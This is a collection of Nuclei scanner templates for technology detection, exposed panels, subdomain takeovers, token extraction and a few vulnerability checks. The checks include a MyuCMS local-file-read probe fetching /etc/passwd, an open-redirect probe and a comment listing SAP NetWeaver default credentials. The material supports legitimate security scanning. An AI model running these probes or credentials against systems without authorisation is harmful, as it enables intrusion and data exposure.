-------------------------------------------------------------------------------- /technologies/harbor-detect.yaml: -------------------------------------------------------------------------------- 1 | id: harbor-detect 2 | 3 | info: 4 | name: Harbor Detect 5 | author: pikpikcu 6 | severity: info 7 | tags: tech,harbor 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/' 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - "Harbor" 19 | part: body 20 | 21 | - type: status 22 | status: 23 | - 200 24 | -------------------------------------------------------------------------------- /workflows/mida-eframework-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: mida-eframework-workflow 2 | 3 | info: 4 | name: Mida eFramework Security Checks 5 | author: CasperGN 6 | description: A simple workflow that runs all Mida eFramework related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/tech-detect.yaml 10 | matchers: 11 | - name: mida-eframework 12 | subtemplates: 13 | - template: vulnerabilities/other/mida-eframework-xss.yaml 14 | -------------------------------------------------------------------------------- /exposed-panels/livezilla-login-panel.yaml: -------------------------------------------------------------------------------- 1 | id: livezilla-login-panel 2 | 3 | info: 4 | name: Livezilla login detect 5 | author: __Fazal 6 | severity: info 7 | tags: panel,livezilla 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/mobile/index.php' 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: status 17 | status: 18 | - 200 19 | 20 | - type: word 21 | words: 22 | - 'LiveZilla' -------------------------------------------------------------------------------- /exposed-panels/strapi-panel.yaml: -------------------------------------------------------------------------------- 1 | id: strapi-panel 2 | 3 | info: 4 | name: Strapi Login Panel 5 | author: idealphase 6 | severity: info 7 | tags: panel,strapi 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/admin/auth/login' 13 | 14 | matchers-condition: and 15 | matchers: 16 | 17 | - type: word 18 | words: 19 | - "Strapi Admin" 20 | 21 | - type: status 22 | status: 23 | - 200 -------------------------------------------------------------------------------- /miscellaneous/display-via-header.yaml: -------------------------------------------------------------------------------- 1 | id: display-via-header 2 | 3 | info: 4 | name: Display Via Header 5 | author: geeknik 6 | reference: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Via 7 | severity: info 8 | tags: misc,generic 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | redirects: true 16 | extractors: 17 | - type: regex 18 | part: header 19 | regex: 20 | - "Via:.*" 21 | -------------------------------------------------------------------------------- /misconfiguration/nginx/nginx-status.yaml: -------------------------------------------------------------------------------- 1 | id: nginx-status 2 | 3 | info: 4 | name: Nginx Status Page 5 | author: dhiyaneshDK 6 | severity: low 7 | tags: misconfig,nginx 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/nginx_status" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - 'Active connections:' 19 | 20 | - type: status 21 | status: 22 | - 200 23 | -------------------------------------------------------------------------------- /takeovers/webflow-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: webflow-takeover 2 | 3 | info: 4 | name: webflow takeover detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | -

The page you are looking for doesn't exist or has been moved.

-------------------------------------------------------------------------------- /takeovers/wufoo-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: wufoo-takeover 2 | 3 | info: 4 | name: wufoo takeover detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - Profile not found 19 | - Hmmm....something is not right. 20 | condition: and -------------------------------------------------------------------------------- /vulnerabilities/other/myucms-lfr.yaml: -------------------------------------------------------------------------------- 1 | id: myucms-lfr 2 | info: 3 | name: MyuCMS Local File Read 4 | author: princechaddha 5 | severity: high 6 | tags: myucms,lfi 7 | reference: https://blog.csdn.net/yalecaltech/article/details/104908257 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1" 13 | matchers: 14 | - type: regex 15 | regex: 16 | - "root:.*:0:0:" 17 | -------------------------------------------------------------------------------- /exposures/tokens/amazon/amazon-mws-auth-token.yaml: -------------------------------------------------------------------------------- 1 | id: amazon-mws-auth-token 2 | 3 | info: 4 | name: Amazon MWS Auth Token 5 | author: puzzlepeaches 6 | severity: info 7 | tags: exposure,token,aws 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | extractors: 15 | - type: regex 16 | part: body 17 | regex: 18 | - "amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" 19 | -------------------------------------------------------------------------------- /miscellaneous/email-extractor.yaml: -------------------------------------------------------------------------------- 1 | id: email-extractor 2 | 3 | info: 4 | name: Email Extractor 5 | author: panch0r3d 6 | severity: info 7 | tags: misc,email 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | extractors: 15 | - type: regex 16 | part: body 17 | regex: 18 | - "[a-zA-Z0-9-_.]{4,}@[A-Za-z0-9_-]+[.](com|org|net|io|gov|co|co.uk|com.mx|com.br|com.sv|co.cr|com.gt|com.hn|com.ni|com.au|com.cn)" 19 | -------------------------------------------------------------------------------- /misconfiguration/laravel-debug-error.yaml: -------------------------------------------------------------------------------- 1 | id: laravel-debug-error 2 | 3 | info: 4 | name: Larvel Debug Method Enabled 5 | author: dhiyaneshDK 6 | severity: medium 7 | tags: debug,laravel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - Whoops! There was an error 19 | 20 | - type: status 21 | status: 22 | - 500 -------------------------------------------------------------------------------- /takeovers/aftership-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: aftership-takeover 2 | 3 | info: 4 | name: Aftership Takeover Detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - Oops.

The page you're looking for doesn't exist. -------------------------------------------------------------------------------- /takeovers/hubspot-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: hubspot-takeover 2 | 3 | info: 4 | name: hubspot takeover detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - "Domain not found" 19 | - "does not exist in our system" 20 | condition: and -------------------------------------------------------------------------------- /takeovers/proposify-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: proposify-takeover 2 | 3 | info: 4 | name: proposify takeover detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - If you need immediate assistance, please contact Welcome to nginx!" 18 | part: body 19 | -------------------------------------------------------------------------------- /technologies/xxljob-admin-detect.yaml: -------------------------------------------------------------------------------- 1 | id: xxljob-admin-detect 2 | 3 | info: 4 | name: XXLJOB Admin Login 5 | author: pdteam 6 | severity: info 7 | tags: tech,xxljob 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/xxl-job-admin/toLogin" 13 | 14 | matchers-condition: and 15 | matchers: 16 | 17 | - type: word 18 | words: 19 | - "XXLJOB" 20 | 21 | - type: status 22 | status: 23 | - 200 -------------------------------------------------------------------------------- /vulnerabilities/other/aspnuke-openredirect.yaml: -------------------------------------------------------------------------------- 1 | id: aspnuke-openredirect 2 | 3 | info: 4 | name: ASP-Nuke Open Redirect 5 | author: pdteam 6 | severity: low 7 | tags: aspnuke,redirect 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/gotoURL.asp?url=google.com&id=43569" 13 | matchers: 14 | - type: regex 15 | part: body 16 | regex: 17 | - '(?m)^(?:Location\s*:\s*)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?google\.com(?:\s*)$' -------------------------------------------------------------------------------- /workflows/magento-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: magento-workflow 2 | 3 | info: 4 | name: Magento Security Checks 5 | author: TechbrunchFR 6 | description: A simple workflow that runs all Magento related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/magento-detect.yaml 10 | subtemplates: 11 | - template: exposures/configs/magento-config.yaml 12 | - template: exposed-panels/magento-admin-panel.yaml 13 | - template: vulnerabilities/magento/ -------------------------------------------------------------------------------- /workflows/vbulletin-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: vbulletin-workflow 2 | 3 | info: 4 | name: vBulletin Security Checks 5 | author: pdteam 6 | description: A simple workflow that runs all vBulletin related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/tech-detect.yaml 10 | matchers: 11 | - name: vbulletin 12 | subtemplates: 13 | - template: cves/2019/CVE-2019-16759.yaml 14 | - template: cves/2020/CVE-2020-12720.yaml 15 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/feature_request.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Feature request 3 | about: Suggest an idea to improve nuclei templates 4 | title: "[Feature] " 5 | labels: '' 6 | assignees: '' 7 | 8 | --- 9 | 10 | **Is your feature request related to a problem? Please describe.** 11 | 12 | A clear and concise description of what the problem is. Ex. I'm always frustrated when [...] 13 | 14 | **Describe the solution you'd like** 15 | 16 | A clear and concise description of what you want to happen. 17 | -------------------------------------------------------------------------------- /exposed-panels/ems-login-panel.yaml: -------------------------------------------------------------------------------- 1 | id: ems-login-panel 2 | 3 | info: 4 | name: EMS Login page detection 5 | author: __Fazal 6 | severity: info 7 | tags: panel,ems 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/EMSWebClient/Login.aspx' 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: status 17 | status: 18 | - 200 19 | 20 | - type: word 21 | words: 22 | - "EMS Web Client - Login" 23 | -------------------------------------------------------------------------------- /exposed-panels/securenvoy-panel.yaml: -------------------------------------------------------------------------------- 1 | id: securenvoy-panel 2 | 3 | info: 4 | name: SecurEnvoy Admin Login 5 | author: 0xrod 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/secadmin/" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - '' 19 | part: body 20 | 21 | - type: status 22 | status: 23 | - 200 -------------------------------------------------------------------------------- /exposed-panels/yarn-manager-exposure.yaml: -------------------------------------------------------------------------------- 1 | id: yarn-manager-exposure 2 | 3 | info: 4 | name: Apache Yarn ResourceManager Exposure / Unauthenticated Access 5 | author: pdteam 6 | severity: low 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/cluster/cluster' 13 | matchers: 14 | - type: word 15 | words: 16 | - 'hadoop' 17 | - 'resourcemanager' 18 | - 'logged in as: dr.who' 19 | condition: and -------------------------------------------------------------------------------- /exposures/apis/strapi-page.yaml: -------------------------------------------------------------------------------- 1 | id: strapi-page 2 | 3 | info: 4 | name: Strapi Page 5 | author: dhiyaneshDk 6 | severity: info 7 | reference: https://www.shodan.io/search?query=http.title%3A%22Welcome+to+your+Strapi+app%22 8 | tags: api,strapi 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - '{{BaseURL}}' 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - 'Welcome to your Strapi app' 19 | condition: and 20 | -------------------------------------------------------------------------------- /exposures/logs/rails-debug-mode.yaml: -------------------------------------------------------------------------------- 1 | id: rails-debug-mode 2 | 3 | info: 4 | name: Rails Debug Mode Enabled 5 | author: pdteam 6 | severity: medium 7 | tags: logs,rails,exposure 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/1238a92f573a48e58d356c42ca2c9610" 13 | matchers: 14 | - type: word 15 | words: 16 | - "Rails.root:" 17 | - "Action Controller: Exception caught" 18 | condition: and 19 | part: body -------------------------------------------------------------------------------- /exposures/tokens/microsoft/microsoft-teams-webhook.yaml: -------------------------------------------------------------------------------- 1 | id: microsoft-teams-webhook 2 | 3 | info: 4 | name: Microsoft Teams Webhook Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | extractors: 14 | - type: regex 15 | part: body 16 | regex: 17 | - 'https://outlook\.office\.com/webhook/[A-Za-z0-9\-@]+/IncomingWebhook/[A-Za-z0-9\-]+/[A-Za-z0-9\-]+' -------------------------------------------------------------------------------- /iot/contacam.yaml: -------------------------------------------------------------------------------- 1 | id: contacam 2 | 3 | info: 4 | name: ContaCam 5 | author: dhiyaneshDk 6 | severity: low 7 | reference: https://www.exploit-db.com/ghdb/6831 8 | tags: iot 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - 'ContaCam' 19 | part: body 20 | - type: status 21 | status: 22 | - 200 23 | -------------------------------------------------------------------------------- /miscellaneous/addeventlistener-detect.yaml: -------------------------------------------------------------------------------- 1 | id: addeventlistener-detect 2 | 3 | info: 4 | name: AddEventlistener detection 5 | author: yavolo 6 | severity: info 7 | tags: xss 8 | reference: https://portswigger.net/web-security/dom-based/controlling-the-web-message-source 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - '{{BaseURL}}' 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - 'window.addEventListener(' 19 | part: body -------------------------------------------------------------------------------- /misconfiguration/druid-monitor.yaml: -------------------------------------------------------------------------------- 1 | id: druid-monitor 2 | info: 3 | name: Druid Monitor Unauthorized Access 4 | author: ohlinge 5 | severity: high 6 | tags: druid,unauth 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/druid/index.html" 12 | 13 | matchers-condition: and 14 | matchers: 15 | - type: word 16 | words: 17 | - 'Druid Stat Index' 18 | 19 | - type: status 20 | status: 21 | - 200 22 | -------------------------------------------------------------------------------- /takeovers/frontify-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: frontify-takeover 2 | 3 | info: 4 | name: frontify takeover detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - 404 - Page Not Found 19 | - Oops… looks like you got lost 20 | condition: and -------------------------------------------------------------------------------- /technologies/itop-detect.yaml: -------------------------------------------------------------------------------- 1 | id: itop-detect 2 | 3 | info: 4 | name: iTop Detect 5 | author: pikpikcu 6 | severity: info 7 | tags: tech,itop 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/pages/UI.php" 13 | 14 | matchers-condition: and 15 | matchers: 16 | 17 | - type: word 18 | part: body 19 | words: 20 | - "iTop login" 21 | 22 | - type: status 23 | status: 24 | - 200 25 | -------------------------------------------------------------------------------- /technologies/node-red-detect.yaml: -------------------------------------------------------------------------------- 1 | id: node-red-detect 2 | 3 | info: 4 | name: Node RED Detect 5 | author: pikpikcu 6 | severity: info 7 | tags: tech,apache 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | matchers-condition: and 15 | matchers: 16 | 17 | - type: word 18 | part: body 19 | words: 20 | - "Node-RED" 21 | 22 | - type: status 23 | status: 24 | - 200 25 | -------------------------------------------------------------------------------- /technologies/yapi-detect.yaml: -------------------------------------------------------------------------------- 1 | id: yapi-detect 2 | 3 | info: 4 | name: YApi Detect 5 | author: pikpikcu 6 | severity: info 7 | tags: tech,yapi 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | matchers-condition: and 15 | matchers: 16 | 17 | - type: word 18 | part: body 19 | words: 20 | - "YApi-高效、易用、功能强大的可视化接口管理平台" 21 | 22 | - type: status 23 | status: 24 | - 200 25 | -------------------------------------------------------------------------------- /workflows/cockpit-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: cockpit-workflow 2 | 3 | info: 4 | name: Agentejo Cockpit Security Checks 5 | author: dwisiswant0 6 | description: A simple workflow that runs all Agentejo Cockpit related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/cockpit-detect.yaml 10 | subtemplates: 11 | - template: cves/2020/CVE-2020-35846.yaml 12 | - template: cves/2020/CVE-2020-35847.yaml 13 | - template: cves/2020/CVE-2020-35848.yaml -------------------------------------------------------------------------------- /exposed-panels/jfrog.yaml: -------------------------------------------------------------------------------- 1 | id: jfrog-login 2 | 3 | info: 4 | name: JFrog Login 5 | author: dhiyaneshDK 6 | severity: info 7 | reference: https://www.exploit-db.com/ghdb/6797 8 | tags: panel 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - '{{BaseURL}}/ui/login/' 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | words: 19 | - 'JFrog' 20 | - type: status 21 | status: 22 | - 200 23 | -------------------------------------------------------------------------------- /exposed-panels/octoprint-login.yaml: -------------------------------------------------------------------------------- 1 | id: octoprint-panel 2 | 3 | info: 4 | name: OctoPrint Login 5 | author: affix 6 | severity: info 7 | tags: octoprint,panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | - "{{BaseURL}}/login/" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | words: 19 | - 'OctoPrint Login' 20 | 21 | - type: status 22 | status: 23 | - 200 -------------------------------------------------------------------------------- /exposed-panels/openerp-database.yaml: -------------------------------------------------------------------------------- 1 | id: openerp-database 2 | 3 | info: 4 | name: OpenERP database instances 5 | author: impramodsargar 6 | severity: info 7 | tags: openerp,panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/web/database/selector/" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - 'Odoo' 19 | 20 | - type: status 21 | status: 22 | - 200 -------------------------------------------------------------------------------- /exposed-panels/zenario-login-panel.yaml: -------------------------------------------------------------------------------- 1 | id: zenario-login-panel 2 | 3 | info: 4 | name: Zenario Admin login 5 | author: __Fazal 6 | severity: info 7 | tags: panel,zenario 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/zenario/admin/welcome.php' 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: status 17 | status: 18 | - 200 19 | 20 | - type: word 21 | words: 22 | - "Welcome to Zenario" 23 | -------------------------------------------------------------------------------- /exposures/tokens/generic/shoppable-token.yaml: -------------------------------------------------------------------------------- 1 | id: shoppable-token 2 | 3 | info: 4 | name: Shoppable Service Auth Token 5 | author: philippedelteil 6 | severity: info 7 | reference: https://ask.shoppable.com/knowledge/quick-start-api-guide 8 | tags: exposure,shoppable,token 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | part: body 18 | words: 19 | - data-shoppable-auth-token 20 | -------------------------------------------------------------------------------- /network/starttls-mail-detect.yaml: -------------------------------------------------------------------------------- 1 | id: starttls-mail-detect 2 | 3 | info: 4 | name: STARTTLS Mail Server Detect 5 | author: r3dg33k 6 | severity: info 7 | tags: mail,starttls,network 8 | 9 | network: 10 | - inputs: 11 | - data: "65686c6f20636865636b746c730a" 12 | type: hex 13 | read-size: 2048 14 | 15 | host: 16 | - "{{Hostname}}" 17 | - "{{Hostname}}:25" 18 | 19 | matchers: 20 | - type: word 21 | words: 22 | - "250-STARTTLS" 23 | -------------------------------------------------------------------------------- /takeovers/launchrock-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: launchrock-takeover 2 | 3 | info: 4 | name: launchrock takeover detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - It looks like you may have taken a wrong turn somewhere. Don't worry...it happens to all of us. -------------------------------------------------------------------------------- /takeovers/pingdom-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: pingdom-takeover 2 | 3 | info: 4 | name: pingdom takeover detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - Public Report Not Activated 19 | - This public report page has not been activated by the user -------------------------------------------------------------------------------- /takeovers/worksites-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: worksites-takeover 2 | 3 | info: 4 | name: worksites takeover detection 5 | author: melbadry9 6 | severity: high 7 | tags: takeover 8 | reference: https://blog.melbadry9.xyz/dangling-dns/xyz-services/ddns-worksites 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: regex 17 | regex: 18 | - "(?:Company Not Found|you’re looking for doesn’t exist)" 19 | -------------------------------------------------------------------------------- /technologies/basic-auth-detection.yaml: -------------------------------------------------------------------------------- 1 | id: basic-auth-detection 2 | 3 | info: 4 | name: Basic auth detection 5 | author: w4cky_ 6 | severity: info 7 | tags: tech,basic-auth 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: status 17 | status: 18 | - 401 19 | 20 | - type: word 21 | words: 22 | - "Www-Authenticate:" 23 | part: header 24 | -------------------------------------------------------------------------------- /technologies/default-fastcgi-page.yaml: -------------------------------------------------------------------------------- 1 | id: default-fastcgi-page 2 | 3 | info: 4 | name: Fastcgi Default Test Page 5 | author: dhiyaneshDk 6 | severity: info 7 | tags: tech,fastcgi 8 | reference: https://www.shodan.io/search?query=http.title%3A%22FastCGI%22 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - '{{BaseURL}}' 14 | matchers: 15 | - type: word 16 | words: 17 | - "TurnKey NGINX PHP FastCGI Server" 18 | part: body 19 | -------------------------------------------------------------------------------- /technologies/default-openresty.yaml: -------------------------------------------------------------------------------- 1 | id: default-openresty 2 | 3 | info: 4 | name: OpenResty Default Page 5 | author: dhiyaneshDk 6 | severity: info 7 | tags: tech,openrestry 8 | reference: https://www.shodan.io/search?query=http.title%3A%22Welcome+to+OpenResty%21%22 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - '{{BaseURL}}' 14 | matchers: 15 | - type: word 16 | words: 17 | - "Welcome to OpenResty!" 18 | part: body 19 | -------------------------------------------------------------------------------- /technologies/firebase-detect.yaml: -------------------------------------------------------------------------------- 1 | id: firebase-detect 2 | 3 | info: 4 | name: firebase detect 5 | author: organiccrap 6 | severity: low 7 | reference: http://ghostlulz.com/google-exposed-firebase-database/ 8 | tags: tech,firebase 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/.settings/rules.json?auth=FIREBASE_SECRET" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - "Could not parse auth token" 19 | part: body 20 | -------------------------------------------------------------------------------- /technologies/jeedom-detect.yaml: -------------------------------------------------------------------------------- 1 | id: jeedom-detect 2 | 3 | info: 4 | name: Jeedom Detect 5 | author: pikpikcu 6 | severity: info 7 | tags: tech,jeedom 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/index.php?v=d" 13 | 14 | matchers-condition: and 15 | matchers: 16 | 17 | - type: word 18 | part: body 19 | words: 20 | - "Jeedom" 21 | 22 | - type: status 23 | status: 24 | - 200 25 | -------------------------------------------------------------------------------- /technologies/sage-detect.yaml: -------------------------------------------------------------------------------- 1 | id: sage-detect 2 | 3 | info: 4 | name: Sage X3 Detect 5 | author: pikpikcu 6 | severity: info 7 | tags: tech,sage 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/auth/login/page" 13 | 14 | matchers-condition: and 15 | matchers: 16 | 17 | - type: word 18 | part: body 19 | words: 20 | - "Sage X3" 21 | 22 | - type: status 23 | status: 24 | - 200 25 | -------------------------------------------------------------------------------- /exposed-panels/go-anywhere-client.yaml: -------------------------------------------------------------------------------- 1 | id: go-anywhere-client 2 | 3 | info: 4 | name: GoAnywhere client login detection 5 | author: iamthefrogy 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/webclient/Login.xhtml" 13 | 14 | redirects: true 15 | max-redirects: 2 16 | matchers: 17 | - type: word 18 | words: 19 | - "Powered by GoAnywhere" 20 | - "GoAnywhere.com" 21 | condition: or -------------------------------------------------------------------------------- /exposed-panels/joomla-panel.yaml: -------------------------------------------------------------------------------- 1 | id: joomla-panel 2 | 3 | info: 4 | name: Joomla Panel 5 | author: its0x08 6 | severity: info 7 | tags: panel,joomla 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/administrator/" 13 | matchers: 14 | - type: word 15 | words: 16 | - '' 17 | - '/administrator/templates/isis/images/joomla.png' 18 | condition: or 19 | -------------------------------------------------------------------------------- /exposed-panels/powerlogic-ion.yaml: -------------------------------------------------------------------------------- 1 | id: powerlogic-ion 2 | 3 | info: 4 | name: PowerLogic ION Exposed 5 | author: dhiyaneshDK 6 | severity: low 7 | reference: https://www.exploit-db.com/ghdb/6810 8 | tags: panel 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - '{{BaseURL}}' 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | words: 19 | - 'PowerLogic ION' 20 | - type: status 21 | status: 22 | - 200 23 | -------------------------------------------------------------------------------- /exposed-panels/sap-netweaver-portal.yaml: -------------------------------------------------------------------------------- 1 | id: sap-netweaver-portal 2 | 3 | info: 4 | name: SAP NetWeaver Portal 5 | author: organiccrap 6 | severity: info 7 | tags: panel,sap 8 | 9 | # SAP Netweaver default creds - SAP*/06071992 or TMSADM/$1Pawd2& 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/irj/portal" 15 | matchers: 16 | - type: word 17 | words: 18 | - "SAP NetWeaver Portal" 19 | part: body 20 | -------------------------------------------------------------------------------- /exposures/configs/symfony-profiler.yaml: -------------------------------------------------------------------------------- 1 | id: symfony-profiler 2 | 3 | info: 4 | name: Symfony Profiler 5 | author: pdteam 6 | severity: high 7 | tags: config,exposure,symfony 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/_profiler/empty/search/results?limit=10" 13 | matchers: 14 | - type: word 15 | words: 16 | - "Symfony Profiler" 17 | - "symfony/profiler/" 18 | condition: and 19 | part: body 20 | -------------------------------------------------------------------------------- /technologies/default-asp.net-page.yaml: -------------------------------------------------------------------------------- 1 | id: default-asp.net-page 2 | 3 | info: 4 | name: ASP.Net Test Page 5 | author: dhiyaneshDk 6 | severity: info 7 | tags: tech,asp 8 | reference: https://www.shodan.io/search?query=http.title%3A%22Home+Page+-+My+ASP.NET+Application%22 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - '{{BaseURL}}' 14 | matchers: 15 | - type: word 16 | words: 17 | - "Home Page - My ASP.NET Application" 18 | part: body 19 | -------------------------------------------------------------------------------- /technologies/default-plesk-page.yaml: -------------------------------------------------------------------------------- 1 | id: default-plesk-page 2 | 3 | info: 4 | name: Plesk Default Test Page 5 | author: dhiyaneshDk 6 | severity: info 7 | tags: tech,plesk 8 | reference: https://www.shodan.io/search?query=http.title%3A%22Web+Server%27s+Default+Page%22 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - '{{BaseURL}}' 14 | matchers: 15 | - type: word 16 | words: 17 | - "Web Server's Default Page" 18 | part: body 19 | -------------------------------------------------------------------------------- /technologies/opencast-detect.yaml: -------------------------------------------------------------------------------- 1 | id: opencast-detect 2 | 3 | info: 4 | name: Opencast detect 5 | author: cyllective 6 | severity: info 7 | description: Detects Opencast 8 | tags: tech,opencast 9 | reference: 10 | - https://github.com/opencast/opencast 11 | 12 | requests: 13 | - method: GET 14 | path: 15 | - "{{BaseURL}}/admin-ng/login.html" 16 | 17 | matchers: 18 | - type: word 19 | part: body 20 | words: 21 | - 'Opencast' 22 | -------------------------------------------------------------------------------- /cves/2020/CVE-2020-13927.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2020-13927 2 | 3 | info: 4 | name: Unauthenticated Airflow Experimental REST API 5 | author: pdteam 6 | severity: critical 7 | tags: cve,cve2020,apache,airflow,unauth 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/api/experimental/latest_runs' 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - '"dag_run_url":' 18 | - '"dag_id":' 19 | - '"items":' 20 | condition: and 21 | -------------------------------------------------------------------------------- /exposed-panels/airflow-panel.yaml: -------------------------------------------------------------------------------- 1 | id: airflow-panel 2 | 3 